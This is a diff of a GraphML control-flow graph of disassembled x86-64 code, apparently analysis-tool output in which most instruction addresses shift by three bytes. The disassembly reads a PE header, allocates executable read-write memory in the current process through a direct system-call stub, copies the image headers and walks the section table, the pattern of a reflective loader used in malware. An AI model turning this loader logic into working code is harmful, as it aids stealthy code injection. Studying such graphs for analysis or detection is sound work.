-        <edge source="block.0x123b:instruction.0x123b" target="block.0x123b:instruction.0x1245"/>
-        <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x1245"/>
-        <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x124c"/>
-        <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x124f"/>
-        <edge source="block.0x123b:instruction.0x1245" target="block.0x123b:instruction.0x124f"/>
-        <edge source="block.0x123b:instruction.0x124c" target="block.0x123b:instruction.0x124f"/>
+        <edge source="block.0x123e:instruction.0x123e" target="block.0x123e:instruction.0x1245"/>
+        <edge source="block.0x123e:instruction.0x123e" target="block.0x123e:instruction.0x1248"/>
+        <edge source="block.0x123e:instruction.0x1245" target="block.0x123e:instruction.0x1248"/>
+        <edge source="block.0x123e:instruction.0x1245" target="block.0x123e:instruction.0x124f"/>
+        <edge source="block.0x123e:instruction.0x1245" target="block.0x123e:instruction.0x1252"/>
+        <edge source="block.0x123e:instruction.0x1248" target="block.0x123e:instruction.0x1252"/>
+        <edge source="block.0x123e:instruction.0x124f" target="block.0x123e:instruction.0x1252"/>
       </graph>
     </node>
-    <node id="block.0x1251">
-      <data key="address">0x1251</data>
+    <node id="block.0x1254">
+      <data key="address">0x1254</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1251</data>
+        <data key="address">0x1254</data>
         <data key="type">instructions</data>
-        <node id="block.0x1251:instruction.0x1251">
-          <data key="address">0x1251</data>
+        <node id="block.0x1254:instruction.0x1254">
+          <data key="address">0x1254</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488345b804</data>
           <data key="instruction.source">add qword ptr [rbp - 0x48], 4</data>
         </node>
-        <node id="block.0x1251:instruction.0x1256">
-          <data key="address">0x1256</data>
+        <node id="block.0x1254:instruction.0x1259">
+          <data key="address">0x1259</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488345b002</data>
           <data key="instruction.source">add qword ptr [rbp - 0x50], 2</data>
         </node>
-        <node id="block.0x1251:instruction.0x125b">
-          <data key="address">0x125b</data>
+        <node id="block.0x1254:instruction.0x125e">
+          <data key="address">0x125e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e954ffffff</data>
-          <data key="instruction.source">jmp 0x11b4</data>
+          <data key="instruction.source">jmp 0x11b7</data>
         </node>
-        <edge source="block.0x1251:instruction.0x1251" target="block.0x1251:instruction.0x1256"/>
-        <edge source="block.0x1251:instruction.0x1256" target="block.0x1251:instruction.0x125b"/>
+        <edge source="block.0x1254:instruction.0x1254" target="block.0x1254:instruction.0x1259"/>
+        <edge source="block.0x1254:instruction.0x1259" target="block.0x1254:instruction.0x125e"/>
       </graph>
     </node>
-    <node id="block.0x1260">
-      <data key="address">0x1260</data>
+    <node id="block.0x1263">
+      <data key="address">0x1263</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1260</data>
+        <data key="address">0x1263</data>
         <data key="type">instructions</data>
-        <node id="block.0x1260:instruction.0x1260">
-          <data key="address">0x1260</data>
+        <node id="block.0x1263:instruction.0x1263">
+          <data key="address">0x1263</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b45f8</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 8]</data>
         </node>
-        <node id="block.0x1260:instruction.0x1264">
-          <data key="address">0x1264</data>
+        <node id="block.0x1263:instruction.0x1267">
+          <data key="address">0x1267</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x1260:instruction.0x1267">
-          <data key="address">0x1267</data>
+        <node id="block.0x1263:instruction.0x126a">
+          <data key="address">0x126a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7427</data>
-          <data key="instruction.source">je 0x1290</data>
+          <data key="instruction.source">je 0x1293</data>
         </node>
-        <edge source="block.0x1260:instruction.0x1260" target="block.0x1260:instruction.0x1264"/>
-        <edge source="block.0x1260:instruction.0x1264" target="block.0x1260:instruction.0x1267"/>
+        <edge source="block.0x1263:instruction.0x1263" target="block.0x1263:instruction.0x1267"/>
+        <edge source="block.0x1263:instruction.0x1267" target="block.0x1263:instruction.0x126a"/>
       </graph>
     </node>
-    <node id="block.0x1269">
-      <data key="address">0x1269</data>
+    <node id="block.0x126c">
+      <data key="address">0x126c</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1269</data>
+        <data key="address">0x126c</data>
         <data key="type">instructions</data>
-        <node id="block.0x1269:instruction.0x1269">
-          <data key="address">0x1269</data>
+        <node id="block.0x126c:instruction.0x126c">
+          <data key="address">0x126c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b45f0</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x10]</data>
         </node>
-        <node id="block.0x1269:instruction.0x126d">
-          <data key="address">0x126d</data>
+        <node id="block.0x126c:instruction.0x1270">
+          <data key="address">0x1270</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x1269:instruction.0x1270">
-          <data key="address">0x1270</data>
+        <node id="block.0x126c:instruction.0x1273">
+          <data key="address">0x1273</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">741e</data>
-          <data key="instruction.source">je 0x1290</data>
+          <data key="instruction.source">je 0x1293</data>
         </node>
-        <edge source="block.0x1269:instruction.0x1269" target="block.0x1269:instruction.0x126d"/>
-        <edge source="block.0x1269:instruction.0x126d" target="block.0x1269:instruction.0x1270"/>
+        <edge source="block.0x126c:instruction.0x126c" target="block.0x126c:instruction.0x1270"/>
+        <edge source="block.0x126c:instruction.0x1270" target="block.0x126c:instruction.0x1273"/>
       </graph>
     </node>
-    <node id="block.0x1272">
-      <data key="address">0x1272</data>
+    <node id="block.0x1275">
+      <data key="address">0x1275</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1272</data>
+        <data key="address">0x1275</data>
         <data key="type">instructions</data>
-        <node id="block.0x1272:instruction.0x1272">
-          <data key="address">0x1272</data>
+        <node id="block.0x1275:instruction.0x1275">
+          <data key="address">0x1275</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b45e8</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x18]</data>
         </node>
-        <node id="block.0x1272:instruction.0x1276">
-          <data key="address">0x1276</data>
+        <node id="block.0x1275:instruction.0x1279">
+          <data key="address">0x1279</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x1272:instruction.0x1279">
-          <data key="address">0x1279</data>
+        <node id="block.0x1275:instruction.0x127c">
+          <data key="address">0x127c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7415</data>
-          <data key="instruction.source">je 0x1290</data>
+          <data key="instruction.source">je 0x1293</data>
         </node>
-        <edge source="block.0x1272:instruction.0x1272" target="block.0x1272:instruction.0x1276"/>
-        <edge source="block.0x1272:instruction.0x1276" target="block.0x1272:instruction.0x1279"/>
+        <edge source="block.0x1275:instruction.0x1275" target="block.0x1275:instruction.0x1279"/>
+        <edge source="block.0x1275:instruction.0x1279" target="block.0x1275:instruction.0x127c"/>
       </graph>
     </node>
-    <node id="block.0x127b">
-      <data key="address">0x127b</data>
+    <node id="block.0x127e">
+      <data key="address">0x127e</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x127b</data>
+        <data key="address">0x127e</data>
         <data key="type">instructions</data>
-        <node id="block.0x127b:instruction.0x127b">
-          <data key="address">0x127b</data>
+        <node id="block.0x127e:instruction.0x127e">
+          <data key="address">0x127e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b8568ffffff</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x98]</data>
         </node>
-        <node id="block.0x127b:instruction.0x1282">
-          <data key="address">0x1282</data>
+        <node id="block.0x127e:instruction.0x1285">
+          <data key="address">0x1285</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x127b:instruction.0x1285">
-          <data key="address">0x1285</data>
+        <node id="block.0x127e:instruction.0x1288">
+          <data key="address">0x1288</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7409</data>
-          <data key="instruction.source">je 0x1290</data>
+          <data key="instruction.source">je 0x1293</data>
         </node>
-        <edge source="block.0x127b:instruction.0x127b" target="block.0x127b:instruction.0x1282"/>
-        <edge source="block.0x127b:instruction.0x1282" target="block.0x127b:instruction.0x1285"/>
+        <edge source="block.0x127e:instruction.0x127e" target="block.0x127e:instruction.0x1285"/>
+        <edge source="block.0x127e:instruction.0x1285" target="block.0x127e:instruction.0x1288"/>
       </graph>
     </node>
-    <node id="block.0x1287">
-      <data key="address">0x1287</data>
+    <node id="block.0x128a">
+      <data key="address">0x128a</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1287</data>
+        <data key="address">0x128a</data>
         <data key="type">instructions</data>
-        <node id="block.0x1287:instruction.0x1287">
-          <data key="address">0x1287</data>
+        <node id="block.0x128a:instruction.0x128a">
+          <data key="address">0x128a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b45e0</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x20]</data>
         </node>
-        <node id="block.0x1287:instruction.0x128b">
-          <data key="address">0x128b</data>
+        <node id="block.0x128a:instruction.0x128e">
+          <data key="address">0x128e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x1287:instruction.0x128e">
-          <data key="address">0x128e</data>
+        <node id="block.0x128a:instruction.0x1291">
+          <data key="address">0x1291</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">750c</data>
-          <data key="instruction.source">jne 0x129c</data>
+          <data key="instruction.source">jne 0x129f</data>
         </node>
-        <edge source="block.0x1287:instruction.0x1287" target="block.0x1287:instruction.0x128b"/>
-        <edge source="block.0x1287:instruction.0x128b" target="block.0x1287:instruction.0x128e"/>
+        <edge source="block.0x128a:instruction.0x128a" target="block.0x128a:instruction.0x128e"/>
+        <edge source="block.0x128a:instruction.0x128e" target="block.0x128a:instruction.0x1291"/>
       </graph>
     </node>
-    <node id="block.0x1290">
-      <data key="address">0x1290</data>
+    <node id="block.0x1293">
+      <data key="address">0x1293</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1290</data>
+        <data key="address">0x1293</data>
         <data key="type">instructions</data>
-        <node id="block.0x1290:instruction.0x1290">
-          <data key="address">0x1290</data>
+        <node id="block.0x1293:instruction.0x1293">
+          <data key="address">0x1293</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b45a0</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x60]</data>
         </node>
-        <node id="block.0x1290:instruction.0x1294">
-          <data key="address">0x1294</data>
+        <node id="block.0x1293:instruction.0x1297">
+          <data key="address">0x1297</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b00</data>
           <data key="instruction.source">mov rax, qword ptr [rax]</data>
         </node>
-        <node id="block.0x1290:instruction.0x1297">
-          <data key="address">0x1297</data>
+        <node id="block.0x1293:instruction.0x129a">
+          <data key="address">0x129a</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e9f0fdffff</data>
+          <data key="instruction.hex">e9edfdffff</data>
           <data key="instruction.source">jmp 0x108c</data>
         </node>
-        <edge source="block.0x1290:instruction.0x1290" target="block.0x1290:instruction.0x1294"/>
-        <edge source="block.0x1290:instruction.0x1294" target="block.0x1290:instruction.0x1297"/>
+        <edge source="block.0x1293:instruction.0x1293" target="block.0x1293:instruction.0x1297"/>
+        <edge source="block.0x1293:instruction.0x1297" target="block.0x1293:instruction.0x129a"/>
       </graph>
     </node>
-    <node id="block.0x129c">
-      <data key="address">0x129c</data>
+    <node id="block.0x129f">
+      <data key="address">0x129f</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x129c</data>
+        <data key="address">0x129f</data>
         <data key="type">instructions</data>
-        <node id="block.0x129c:instruction.0x129c">
-          <data key="address">0x129c</data>
+        <node id="block.0x129f:instruction.0x129f">
+          <data key="address">0x129f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd8</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x28]</data>
         </node>
-        <node id="block.0x129c:instruction.0x12a0">
-          <data key="address">0x12a0</data>
+        <node id="block.0x129f:instruction.0x12a3">
+          <data key="address">0x12a3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b413c</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x3c]</data>
         </node>
-        <node id="block.0x129c:instruction.0x12a3">
-          <data key="address">0x12a3</data>
+        <node id="block.0x129f:instruction.0x12a6">
+          <data key="address">0x12a6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8d2401</data>
           <data key="instruction.source">lea r12, [rcx + rax]</data>
         </node>
-        <node id="block.0x129c:instruction.0x12a7">
-          <data key="address">0x12a7</data>
+        <node id="block.0x129f:instruction.0x12aa">
+          <data key="address">0x12aa</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8965c8</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x38], r12</data>
         </node>
-        <node id="block.0x129c:instruction.0x12ab">
-          <data key="address">0x12ab</data>
+        <node id="block.0x129f:instruction.0x12ae">
+          <data key="address">0x12ae</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec48</data>
           <data key="instruction.source">sub rsp, 0x48</data>
         </node>
-        <node id="block.0x129c:instruction.0x12af">
-          <data key="address">0x12af</data>
+        <node id="block.0x129f:instruction.0x12b2">
+          <data key="address">0x12b2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831c0</data>
           <data key="instruction.source">xor rax, rax</data>
         </node>
-        <node id="block.0x129c:instruction.0x12b2">
-          <data key="address">0x12b2</data>
+        <node id="block.0x129f:instruction.0x12b5">
+          <data key="address">0x12b5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889442438</data>
           <data key="instruction.source">mov qword ptr [rsp + 0x38], rax</data>
         </node>
-        <node id="block.0x129c:instruction.0x12b7">
-          <data key="address">0x12b7</data>
+        <node id="block.0x129f:instruction.0x12ba">
+          <data key="address">0x12ba</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b442450</data>
           <data key="instruction.source">mov eax, dword ptr [r12 + 0x50]</data>
         </node>
-        <node id="block.0x129c:instruction.0x12bc">
-          <data key="address">0x12bc</data>
+        <node id="block.0x129f:instruction.0x12bf">
+          <data key="address">0x12bf</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889442440</data>
           <data key="instruction.source">mov qword ptr [rsp + 0x40], rax</data>
         </node>
-        <node id="block.0x129c:instruction.0x12c1">
-          <data key="address">0x12c1</data>
+        <node id="block.0x129f:instruction.0x12c4">
+          <data key="address">0x12c4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48c7c1ffffffff</data>
           <data key="instruction.source">mov rcx, 0xffffffffffffffff</data>
         </node>
-        <node id="block.0x129c:instruction.0x12c8">
-          <data key="address">0x12c8</data>
+        <node id="block.0x129f:instruction.0x12cb">
+          <data key="address">0x12cb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488d542438</data>
           <data key="instruction.source">lea rdx, [rsp + 0x38]</data>
         </node>
-        <node id="block.0x129c:instruction.0x12cd">
-          <data key="address">0x12cd</data>
+        <node id="block.0x129f:instruction.0x12d0">
+          <data key="address">0x12d0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4d31c0</data>
           <data key="instruction.source">xor r8, r8</data>
         </node>
-        <node id="block.0x129c:instruction.0x12d0">
-          <data key="address">0x12d0</data>
+        <node id="block.0x129f:instruction.0x12d3">
+          <data key="address">0x12d3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8d4c2440</data>
           <data key="instruction.source">lea r9, [rsp + 0x40]</data>
         </node>
-        <node id="block.0x129c:instruction.0x12d5">
-          <data key="address">0x12d5</data>
+        <node id="block.0x129f:instruction.0x12d8">
+          <data key="address">0x12d8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c744242000300000</data>
           <data key="instruction.source">mov dword ptr [rsp + 0x20], 0x3000</data>
         </node>
-        <node id="block.0x129c:instruction.0x12dd">
-          <data key="address">0x12dd</data>
+        <node id="block.0x129f:instruction.0x12e0">
+          <data key="address">0x12e0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c744242840000000</data>
           <data key="instruction.source">mov dword ptr [rsp + 0x28], 0x40</data>
         </node>
-        <node id="block.0x129c:instruction.0x12e5">
-          <data key="address">0x12e5</data>
+        <node id="block.0x129f:instruction.0x12e8">
+          <data key="address">0x12e8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b55e8</data>
           <data key="instruction.source">mov r10, qword ptr [rbp - 0x18]</data>
         </node>
-        <node id="block.0x129c:instruction.0x12e9">
-          <data key="address">0x12e9</data>
+        <node id="block.0x129f:instruction.0x12ec">
+          <data key="address">0x12ec</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e892020000</data>
-          <data key="instruction.source">call 0x1580</data>
+          <data key="instruction.source">call 0x1583</data>
         </node>
-        <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12a0"/>
-        <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12a3"/>
-        <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12b2"/>
-        <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12c1"/>
-        <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12a3"/>
-        <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12a7"/>
-        <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12af"/>
-        <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12c1"/>
-        <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12a7"/>
-        <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12af"/>
-        <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12b7"/>
-        <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12c1"/>
-        <edge source="block.0x129c:instruction.0x12a7" target="block.0x129c:instruction.0x12b2"/>
-        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12af"/>
-        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12b2"/>
-        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12bc"/>
-        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12c8"/>
-        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12d0"/>
-        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12d5"/>
-        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12dd"/>
-        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12af" target="block.0x129c:instruction.0x12b2"/>
-        <edge source="block.0x129c:instruction.0x12af" target="block.0x129c:instruction.0x12b7"/>
-        <edge source="block.0x129c:instruction.0x12af" target="block.0x129c:instruction.0x12cd"/>
-        <edge source="block.0x129c:instruction.0x12b2" target="block.0x129c:instruction.0x12b7"/>
-        <edge source="block.0x129c:instruction.0x12b2" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12b7" target="block.0x129c:instruction.0x12bc"/>
-        <edge source="block.0x129c:instruction.0x12bc" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12c1" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12c8" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12cd" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12d0" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12d5" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12dd" target="block.0x129c:instruction.0x12e5"/>
-        <edge source="block.0x129c:instruction.0x12dd" target="block.0x129c:instruction.0x12e9"/>
-        <edge source="block.0x129c:instruction.0x12e5" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129f:instruction.0x129f" target="block.0x129f:instruction.0x12a3"/>
+        <edge source="block.0x129f:instruction.0x129f" target="block.0x129f:instruction.0x12a6"/>
+        <edge source="block.0x129f:instruction.0x129f" target="block.0x129f:instruction.0x12b5"/>
+        <edge source="block.0x129f:instruction.0x129f" target="block.0x129f:instruction.0x12c4"/>
+        <edge source="block.0x129f:instruction.0x12a3" target="block.0x129f:instruction.0x12a6"/>
+        <edge source="block.0x129f:instruction.0x12a3" target="block.0x129f:instruction.0x12aa"/>
+        <edge source="block.0x129f:instruction.0x12a3" target="block.0x129f:instruction.0x12b2"/>
+        <edge source="block.0x129f:instruction.0x12a3" target="block.0x129f:instruction.0x12c4"/>
+        <edge source="block.0x129f:instruction.0x12a6" target="block.0x129f:instruction.0x12aa"/>
+        <edge source="block.0x129f:instruction.0x12a6" target="block.0x129f:instruction.0x12b2"/>
+        <edge source="block.0x129f:instruction.0x12a6" target="block.0x129f:instruction.0x12ba"/>
+        <edge source="block.0x129f:instruction.0x12a6" target="block.0x129f:instruction.0x12c4"/>
+        <edge source="block.0x129f:instruction.0x12aa" target="block.0x129f:instruction.0x12b5"/>
+        <edge source="block.0x129f:instruction.0x12ae" target="block.0x129f:instruction.0x12b2"/>
+        <edge source="block.0x129f:instruction.0x12ae" target="block.0x129f:instruction.0x12b5"/>
+        <edge source="block.0x129f:instruction.0x12ae" target="block.0x129f:instruction.0x12bf"/>
+        <edge source="block.0x129f:instruction.0x12ae" target="block.0x129f:instruction.0x12cb"/>
+        <edge source="block.0x129f:instruction.0x12ae" target="block.0x129f:instruction.0x12d3"/>
+        <edge source="block.0x129f:instruction.0x12ae" target="block.0x129f:instruction.0x12d8"/>
+        <edge source="block.0x129f:instruction.0x12ae" target="block.0x129f:instruction.0x12e0"/>
+        <edge source="block.0x129f:instruction.0x12ae" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12b2" target="block.0x129f:instruction.0x12b5"/>
+        <edge source="block.0x129f:instruction.0x12b2" target="block.0x129f:instruction.0x12ba"/>
+        <edge source="block.0x129f:instruction.0x12b2" target="block.0x129f:instruction.0x12d0"/>
+        <edge source="block.0x129f:instruction.0x12b5" target="block.0x129f:instruction.0x12ba"/>
+        <edge source="block.0x129f:instruction.0x12b5" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12ba" target="block.0x129f:instruction.0x12bf"/>
+        <edge source="block.0x129f:instruction.0x12bf" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12c4" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12cb" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12d0" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12d3" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12d8" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12e0" target="block.0x129f:instruction.0x12e8"/>
+        <edge source="block.0x129f:instruction.0x12e0" target="block.0x129f:instruction.0x12ec"/>
+        <edge source="block.0x129f:instruction.0x12e8" target="block.0x129f:instruction.0x12ec"/>
       </graph>
     </node>
-    <node id="block.0x12ee">
-      <data key="address">0x12ee</data>
+    <node id="block.0x12f1">
+      <data key="address">0x12f1</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x12ee</data>
+        <data key="address">0x12f1</data>
         <data key="type">instructions</data>
-        <node id="block.0x12ee:instruction.0x12ee">
-          <data key="address">0x12ee</data>
+        <node id="block.0x12f1:instruction.0x12f1">
+          <data key="address">0x12f1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b442438</data>
           <data key="instruction.source">mov rax, qword ptr [rsp + 0x38]</data>
         </node>
-        <node id="block.0x12ee:instruction.0x12f3">
-          <data key="address">0x12f3</data>
+        <node id="block.0x12f1:instruction.0x12f6">
+          <data key="address">0x12f6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c448</data>
           <data key="instruction.source">add rsp, 0x48</data>
         </node>
-        <node id="block.0x12ee:instruction.0x12f7">
-          <data key="address">0x12f7</data>
+        <node id="block.0x12f1:instruction.0x12fa">
+          <data key="address">0x12fa</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488945d0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x30], rax</data>
         </node>
-        <node id="block.0x12ee:instruction.0x12fb">
-          <data key="address">0x12fb</data>
+        <node id="block.0x12f1:instruction.0x12fe">
+          <data key="address">0x12fe</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4c2454</data>
           <data key="instruction.source">mov ecx, dword ptr [r12 + 0x54]</data>
         </node>
-        <node id="block.0x12ee:instruction.0x1300">
-          <data key="address">0x1300</data>
+        <node id="block.0x12f1:instruction.0x1303">
+          <data key="address">0x1303</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b75d8</data>
           <data key="instruction.source">mov rsi, qword ptr [rbp - 0x28]</data>
         </node>
-        <node id="block.0x12ee:instruction.0x1304">
-          <data key="address">0x1304</data>
+        <node id="block.0x12f1:instruction.0x1307">
+          <data key="address">0x1307</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b7dd0</data>
           <data key="instruction.source">mov rdi, qword ptr [rbp - 0x30]</data>
         </node>
-        <edge source="block.0x12ee:instruction.0x12ee" target="block.0x12ee:instruction.0x12f3"/>
-        <edge source="block.0x12ee:instruction.0x12ee" target="block.0x12ee:instruction.0x12f7"/>
-        <edge source="block.0x12ee:instruction.0x12f7" target="block.0x12ee:instruction.0x12fb"/>
-        <edge source="block.0x12ee:instruction.0x12f7" target="block.0x12ee:instruction.0x1304"/>
+        <edge source="block.0x12f1:instruction.0x12f1" target="block.0x12f1:instruction.0x12f6"/>
+        <edge source="block.0x12f1:instruction.0x12f1" target="block.0x12f1:instruction.0x12fa"/>
+        <edge source="block.0x12f1:instruction.0x12fa" target="block.0x12f1:instruction.0x12fe"/>
+        <edge source="block.0x12f1:instruction.0x12fa" target="block.0x12f1:instruction.0x1307"/>
       </graph>
     </node>
-    <node id="block.0x1308">
-      <data key="address">0x1308</data>
+    <node id="block.0x130b">
+      <data key="address">0x130b</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1308</data>
+        <data key="address">0x130b</data>
         <data key="type">instructions</data>
-        <node id="block.0x1308:instruction.0x1308">
-          <data key="address">0x1308</data>
+        <node id="block.0x130b:instruction.0x130b">
+          <data key="address">0x130b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">f3a4</data>
           <data key="instruction.source">rep movsb byte ptr [rdi], byte ptr [rsi]</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x130a">
-      <data key="address">0x130a</data>
+    <node id="block.0x130d">
+      <data key="address">0x130d</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x130a</data>
+        <data key="address">0x130d</data>
         <data key="type">instructions</data>
-        <node id="block.0x130a:instruction.0x130a">
-          <data key="address">0x130a</data>
+        <node id="block.0x130d:instruction.0x130d">
+          <data key="address">0x130d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">490fb7442414</data>
           <data key="instruction.source">movzx rax, word ptr [r12 + 0x14]</data>
         </node>
-        <node id="block.0x130a:instruction.0x1310">
-          <data key="address">0x1310</data>
+        <node id="block.0x130d:instruction.0x1313">
+          <data key="address">0x1313</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4d8d6c0418</data>
           <data key="instruction.source">lea r13, [r12 + rax + 0x18]</data>
         </node>
-        <node id="block.0x130a:instruction.0x1315">
-          <data key="address">0x1315</data>
+        <node id="block.0x130d:instruction.0x1318">
+          <data key="address">0x1318</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">450fb77c2406</data>
           <data key="instruction.source">movzx r15d, word ptr [r12 + 6]</data>
         </node>
-        <edge source="block.0x130a:instruction.0x130a" target="block.0x130a:instruction.0x1310"/>
+        <edge source="block.0x130d:instruction.0x130d" target="block.0x130d:instruction.0x1313"/>
       </graph>
     </node>
-    <node id="block.0x131b">
-      <data key="address">0x131b</data>
+    <node id="block.0x131e">
+      <data key="address">0x131e</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x131b</data>
+        <data key="address">0x131e</data>
         <data key="type">instructions</data>
-        <node id="block.0x131b:instruction.0x131b">
-          <data key="address">0x131b</data>
+        <node id="block.0x131e:instruction.0x131e">
+          <data key="address">0x131e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4585ff</data>
           <data key="instruction.source">test r15d, r15d</data>
         </node>
-        <node id="block.0x131b:instruction.0x131e">
-          <data key="address">0x131e</data>
+        <node id="block.0x131e:instruction.0x1321">
+          <data key="address">0x1321</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7425</data>
-          <data key="instruction.source">je 0x1345</data>
